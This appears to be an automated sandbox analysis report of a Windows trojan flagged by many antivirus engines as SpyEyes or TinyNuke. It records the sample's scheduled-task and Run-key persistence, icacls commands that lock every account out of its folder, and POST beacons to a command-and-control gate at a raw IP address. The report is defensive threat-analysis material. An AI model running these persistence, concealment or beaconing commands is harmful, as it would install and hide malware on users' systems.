Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Sept. 7, 2021, 7:01 p.m. | Sept. 7, 2021, 7:08 p.m. |
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
2276-
schtasks.exe schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
2668
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
2664-
icacls.exe icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
2080
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
2092-
icacls.exe icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
1204
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
2704-
icacls.exe icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
1296
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
2412-
icacls.exe icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
204
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)"
2040-
icacls.exe icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)"
2988
-
-
5OEH.exe "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe"
2232
-
Suricata Alerts
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
section | code |
section | data |
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://37.49.230.185/bp/gate.php?017BD04FB3BF45B68167E |
request | POST http://37.49.230.185/bp/gate.php?017BD04FB3BF45B68167E |
request | POST http://37.49.230.185/bp/gate.php?017BD04FB3BF45B68167E |
description | 5OEH.exe tried to sleep 146 seconds, actually delayed analysis time by 146 seconds |
file | C:\Users\test22\AppData\Local\7601.17514.amd64fre.win7sp1_rtm.101119-1850_x86Maria.dll |
cmdline | cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)" |
cmdline | "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)" |
cmdline | cmd.exe /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f |
cmdline | cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)" |
cmdline | "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)" |
cmdline | cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)" |
cmdline | "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)" |
cmdline | schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f |
cmdline | cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)" |
cmdline | "C:\Windows\System32\cmd.exe" /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f |
cmdline | "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)" |
cmdline | cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)" |
cmdline | "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)" |
cmdline | cmd.exe /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f |
cmdline | schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f |
cmdline | "C:\Windows\System32\cmd.exe" /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f |
host | 37.49.230.185 |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\{5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} | reg_value | C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe | ||||||
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\{5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} | reg_value | C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe | ||||||
cmdline | cmd.exe /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f | ||||||||
cmdline | schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f | ||||||||
cmdline | "C:\Windows\System32\cmd.exe" /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f |
cmdline | cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)" |
cmdline | "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)" |
cmdline | cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)" |
cmdline | "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)" |
cmdline | icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)" |
cmdline | cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)" |
cmdline | "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)" |
cmdline | cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)" |
cmdline | "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)" |
cmdline | cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)" |
cmdline | "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)" |
cmdline | icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)" |
cmdline | icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)" |
cmdline | icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)" |
cmdline | icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)" |
cmdline | cmd.exe /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f |
cmdline | schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f |
cmdline | "C:\Windows\System32\cmd.exe" /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f |
Bkav | W32.SpyEyesaND.Trojan |
Lionic | Trojan.Win32.SpyEyes.l!c |
Elastic | malicious (high confidence) |
MicroWorld-eScan | Trojan.GenericKD.37249392 |
FireEye | Generic.mg.385eccb9e7113680 |
McAfee | GenericRXMI-NY!385ECCB9E711 |
Cylance | Unsafe |
VIPRE | Trojan.Win32.Generic!BT |
CrowdStrike | win/malicious_confidence_100% (W) |
Alibaba | TrojanSpy:Win32/SpyEyes.26aa6225 |
K7GW | Trojan ( 0054f5af1 ) |
K7AntiVirus | Trojan ( 0054f5af1 ) |
BitDefenderTheta | Gen:NN.ZexaF.34126.ou2@aaJWp7hi |
Cyren | W32/Trojan.RTCJ-5872 |
Symantec | ML.Attribute.HighConfidence |
ESET-NOD32 | a variant of Win32/Agent.AARD |
APEX | Malicious |
Paloalto | generic.ml |
ClamAV | Win.Malware.TinyNuke-9863711-1 |
Kaspersky | HEUR:Trojan-Spy.Win32.SpyEyes.gen |
BitDefender | Trojan.GenericKD.37249392 |
Avast | Win32:Trojan-gen |
Ad-Aware | Trojan.GenericKD.37249392 |
Sophos | Mal/Generic-S |
Zillya | Trojan.SpyEyes.Win32.15359 |
TrendMicro | TROJ_GEN.R002C0PGB21 |
McAfee-GW-Edition | GenericRXMI-NY!385ECCB9E711 |
Emsisoft | Trojan.GenericKD.37249392 (B) |
Ikarus | Trojan.Win32.Agent |
Jiangmin | TrojanSpy.SpyEyes.ppa |
Avira | TR/Agent.ouzrw |
Antiy-AVL | Trojan/Generic.ASMalwS.33E8AE7 |
Gridinsoft | Trojan.Win32.Agent.vb |
Microsoft | Trojan:Win32/Mamson.A!ac |
ZoneAlarm | HEUR:Trojan-Spy.Win32.SpyEyes.gen |
GData | Trojan.GenericKD.37249392 |
Cynet | Malicious (score: 99) |
Acronis | suspicious |
ALYac | Trojan.GenericKD.37249392 |
MAX | malware (ai score=81) |
VBA32 | BScope.Trojan.Fuerboos |
Malwarebytes | Malware.AI.4123601789 |
TrendMicro-HouseCall | TROJ_GEN.R002C0PGB21 |
Yandex | Trojan.Agent!XUAvosWD/oY |
SentinelOne | Static AI - Suspicious PE |
eGambit | PE.Heur.InvalidSig |
Fortinet | W32/Agent.AARD!tr |
AVG | Win32:Trojan-gen |
Panda | Trj/GdSda.A |